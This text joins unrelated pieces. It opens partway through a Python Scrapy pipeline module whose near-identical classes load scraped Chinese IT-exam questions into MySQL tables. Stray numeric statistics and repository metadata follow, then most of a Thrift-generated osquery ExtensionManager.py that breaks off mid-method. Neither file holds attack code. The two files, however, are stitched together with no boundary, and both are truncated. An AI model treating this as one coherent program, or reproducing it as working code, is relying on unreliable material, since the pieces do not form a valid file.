username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xxxt_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 信息安全工程师上午题库入库
class xxaqMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xxaq_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 系统集成项目管理工程师上午题库入库
class xtjcMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xtjc_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 系统规划与管理师上午题库入库
class xtghMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xtgh_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 网络规划设计师上午题库入库
class wlghMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into wlgh_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 系统架构设计师上午题库入库
class xtjgMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xtjg_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 系统分析师上午题库入库
class xtfxMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xtfx_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 信息系统项目管理师上午题库入库
class xxxtxmMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xxxtxm_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 程序员上午题库入库
class cxyMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into cxy_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 信息处理技术员上午题库入库
class xxclMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xxcl_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 网络管理员
class wlglMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into wlgl_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
| 36.007036
| 364
| 0.586224
| 4,507
| 40,940
| 5.226093
| 0.051697
| 0.01919
| 0.026238
| 0.031587
| 0.903244
| 0.8973
| 0.895304
| 0.887662
| 0.887662
| 0.887662
| 0
| 0.00192
| 0.287738
| 40,940
| 1,137
| 365
| 36.007036
| 0.80583
| 0.043381
| 0
| 0.87108
| 0
| 0.027875
| 0.177136
| 0.01703
| 0.004646
| 0
| 0
| 0
| 0
| 1
| 0.154472
| false
| 0.094077
| 0.005807
| 0.023229
| 0.293844
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
339a0166df9fe7ba6f5f38a47627b30a26ff6f98
| 39,817
|
py
|
Python
|
osquery/extensions/ExtensionManager.py
|
eoinmiller-r7/osquery-python
|
8621cb712cf09c7e46654fc5dca87597e2c0d259
|
[
"BSD-3-Clause"
] | 274
|
2015-04-30T00:59:02.000Z
|
2022-03-19T17:51:37.000Z
|
osquery/extensions/ExtensionManager.py
|
eoinmiller-r7/osquery-python
|
8621cb712cf09c7e46654fc5dca87597e2c0d259
|
[
"BSD-3-Clause"
] | 51
|
2015-05-01T02:40:45.000Z
|
2021-09-01T19:59:54.000Z
|
osquery/extensions/ExtensionManager.py
|
eoinmiller-r7/osquery-python
|
8621cb712cf09c7e46654fc5dca87597e2c0d259
|
[
"BSD-3-Clause"
] | 55
|
2015-05-18T18:27:32.000Z
|
2022-01-05T04:10:07.000Z
|
#
# Autogenerated by Thrift Compiler (0.10.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import osquery.extensions.Extension
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
class Iface(osquery.extensions.Extension.Iface):
def extensions(self):
pass
def options(self):
pass
def registerExtension(self, info, registry):
"""
Parameters:
- info
- registry
"""
pass
def deregisterExtension(self, uuid):
"""
Parameters:
- uuid
"""
pass
def query(self, sql):
"""
Parameters:
- sql
"""
pass
def getQueryColumns(self, sql):
"""
Parameters:
- sql
"""
pass
class Client(osquery.extensions.Extension.Client, Iface):
def __init__(self, iprot, oprot=None):
osquery.extensions.Extension.Client.__init__(self, iprot, oprot)
def extensions(self):
self.send_extensions()
return self.recv_extensions()
def send_extensions(self):
self._oprot.writeMessageBegin('extensions', TMessageType.CALL, self._seqid)
args = extensions_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_extensions(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = extensions_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "extensions failed: unknown result")
def options(self):
self.send_options()
return self.recv_options()
def send_options(self):
self._oprot.writeMessageBegin('options', TMessageType.CALL, self._seqid)
args = options_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_options(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = options_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "options failed: unknown result")
def registerExtension(self, info, registry):
"""
Parameters:
- info
- registry
"""
self.send_registerExtension(info, registry)
return self.recv_registerExtension()
def send_registerExtension(self, info, registry):
self._oprot.writeMessageBegin('registerExtension', TMessageType.CALL, self._seqid)
args = registerExtension_args()
args.info = info
args.registry = registry
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_registerExtension(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = registerExtension_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "registerExtension failed: unknown result")
def deregisterExtension(self, uuid):
"""
Parameters:
- uuid
"""
self.send_deregisterExtension(uuid)
return self.recv_deregisterExtension()
def send_deregisterExtension(self, uuid):
self._oprot.writeMessageBegin('deregisterExtension', TMessageType.CALL, self._seqid)
args = deregisterExtension_args()
args.uuid = uuid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deregisterExtension(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = deregisterExtension_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "deregisterExtension failed: unknown result")
def query(self, sql):
"""
Parameters:
- sql
"""
self.send_query(sql)
return self.recv_query()
def send_query(self, sql):
self._oprot.writeMessageBegin('query', TMessageType.CALL, self._seqid)
args = query_args()
args.sql = sql
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_query(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = query_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "query failed: unknown result")
def getQueryColumns(self, sql):
"""
Parameters:
- sql
"""
self.send_getQueryColumns(sql)
return self.recv_getQueryColumns()
def send_getQueryColumns(self, sql):
self._oprot.writeMessageBegin('getQueryColumns', TMessageType.CALL, self._seqid)
args = getQueryColumns_args()
args.sql = sql
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getQueryColumns(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = getQueryColumns_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getQueryColumns failed: unknown result")
class Processor(osquery.extensions.Extension.Processor, Iface, TProcessor):
def __init__(self, handler):
osquery.extensions.Extension.Processor.__init__(self, handler)
self._processMap["extensions"] = Processor.process_extensions
self._processMap["options"] = Processor.process_options
self._processMap["registerExtension"] = Processor.process_registerExtension
self._processMap["deregisterExtension"] = Processor.process_deregisterExtension
self._processMap["query"] = Processor.process_query
self._processMap["getQueryColumns"] = Processor.process_getQueryColumns
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_extensions(self, seqid, iprot, oprot):
args = extensions_args()
args.read(iprot)
iprot.readMessageEnd()
result = extensions_result()
try:
result.success = self._handler.extensions()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("extensions", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_options(self, seqid, iprot, oprot):
args = options_args()
args.read(iprot)
iprot.readMessageEnd()
result = options_result()
try:
result.success = self._handler.options()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("options", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_registerExtension(self, seqid, iprot, oprot):
args = registerExtension_args()
args.read(iprot)
iprot.readMessageEnd()
result = registerExtension_result()
try:
result.success = self._handler.registerExtension(args.info, args.registry)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("registerExtension", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deregisterExtension(self, seqid, iprot, oprot):
args = deregisterExtension_args()
args.read(iprot)
iprot.readMessageEnd()
result = deregisterExtension_result()
try:
result.success = self._handler.deregisterExtension(args.uuid)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("deregisterExtension", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_query(self, seqid, iprot, oprot):
args = query_args()
args.read(iprot)
iprot.readMessageEnd()
result = query_result()
try:
result.success = self._handler.query(args.sql)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("query", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getQueryColumns(self, seqid, iprot, oprot):
args = getQueryColumns_args()
args.read(iprot)
iprot.readMessageEnd()
result = getQueryColumns_result()
try:
result.success = self._handler.getQueryColumns(args.sql)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("getQueryColumns", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class extensions_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('extensions_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class extensions_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.MAP, 'success', (TType.I64, None, TType.STRUCT, (InternalExtensionInfo, InternalExtensionInfo.thrift_spec), False), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype26, _vtype27, _size25) = iprot.readMapBegin()
for _i29 in range(_size25):
_key30 = iprot.readI64()
_val31 = InternalExtensionInfo()
_val31.read(iprot)
self.success[_key30] = _val31
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('extensions_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I64, TType.STRUCT, len(self.success))
for kiter32, viter33 in self.success.items():
oprot.writeI64(kiter32)
viter33.write(oprot)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class options_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('options_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class options_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.MAP, 'success', (TType.STRING, 'UTF8', TType.STRUCT, (InternalOptionInfo, InternalOptionInfo.thrift_spec), False), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype35, _vtype36, _size34) = iprot.readMapBegin()
for _i38 in range(_size34):
_key39 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val40 = InternalOptionInfo()
_val40.read(iprot)
self.success[_key39] = _val40
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('options_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.STRING, TType.STRUCT, len(self.success))
for kiter41, viter42 in self.success.items():
oprot.writeString(kiter41.encode('utf-8') if sys.version_info[0] == 2 else kiter41)
viter42.write(oprot)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class registerExtension_args(object):
"""
Attributes:
- info
- registry
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'info', (InternalExtensionInfo, InternalExtensionInfo.thrift_spec), None, ), # 1
(2, TType.MAP, 'registry', (TType.STRING, 'UTF8', TType.MAP, (TType.STRING, 'UTF8', TType.LIST, (TType.MAP, (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), False), False), False), None, ), # 2
)
def __init__(self, info=None, registry=None,):
self.info = info
self.registry = registry
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.info = InternalExtensionInfo()
self.info.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.MAP:
self.registry = {}
(_ktype44, _vtype45, _size43) = iprot.readMapBegin()
for _i47 in range(_size43):
_key48 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val49 = {}
(_ktype51, _vtype52, _size50) = iprot.readMapBegin()
for _i54 in range(_size50):
_key55 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val56 = []
(_etype60, _size57) = iprot.readListBegin()
for _i61 in range(_size57):
_elem62 = {}
(_ktype64, _vtype65, _size63) = iprot.readMapBegin()
for _i67 in range(_size63):
_key68 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val69 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_elem62[_key68] = _val69
iprot.readMapEnd()
_val56.append(_elem62)
iprot.readListEnd()
_val49[_key55] = _val56
iprot.readMapEnd()
self.registry[_key48] = _val49
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
